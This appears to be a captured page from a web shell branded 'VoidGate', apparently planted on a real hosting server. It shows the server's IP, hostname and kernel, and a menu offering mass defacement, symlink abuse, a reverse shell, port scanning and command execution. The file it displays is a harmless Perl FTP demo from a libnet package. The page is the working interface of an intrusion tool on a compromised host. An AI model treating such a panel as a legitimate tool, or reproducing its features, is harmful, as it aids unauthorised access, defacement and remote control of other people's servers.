ヤミRoot VoidGate
User / IP
:
216.73.216.2
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
.cpanm
/
work
/
1568630680.21759
/
libnet-3.11
/
demos
/
Viewing: ftp
#!perl use 5.008001; use strict; use warnings; use blib; use Getopt::Long; use Net::FTP; our $opt_debug = undef; our $opt_firewall = undef; GetOptions(qw(debug firewall=s)); my @firewall = defined $opt_firewall ? (Firewall => $opt_firewall) : (); foreach my $host (@ARGV) { my $ftp = Net::FTP->new($host, @firewall, Debug => $opt_debug ? 1 : 0); $ftp->login(); print $ftp->pwd,"\n"; $ftp->quit; }
Coded With 💗 by
0x6ick